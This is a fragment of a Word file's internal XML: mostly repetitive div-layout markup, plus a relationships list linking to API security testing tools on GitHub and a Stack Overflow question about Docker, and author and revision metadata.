            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="813714426">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1666737655">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="120"/>
                  <w:marBottom w:val="120"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="151796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66444">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="347370693">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1653413256">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="470757187">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="120"/>
                  <w:marBottom w:val="120"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="110110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4276">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1080905506">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1799257408">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1070276503">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1275478523">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1343510675">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1467352701">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1487623053">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1666858477">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1724712502">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2093693248">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="211813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0xsauby/Astra" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://stackoverflow.com/questions/47433576/starting-docker-container-using-python-script" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/hdiv/automatic-api-attack-tool" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://stackoverflow.com/questions/47433576/starting-docker-container-using-python-scrip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ssetnote/kiterunner" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://stackoverflow.com/questions/47433576/starting-docker-container-using-python-scrip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PalindromeLabs/STEWS" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:500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44254-B2DE-C747-94BA-BC632B3BC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11</Pages>
  <Words>2187</Words>
  <Characters>12472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Nirvana ELahi</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Nirvana ELahi</cp:lastModifiedBy>
  <cp:revision>54</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-23T06:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-13T19:04:00Z</dcterms:modified>
</cp:coreProperties>
</file>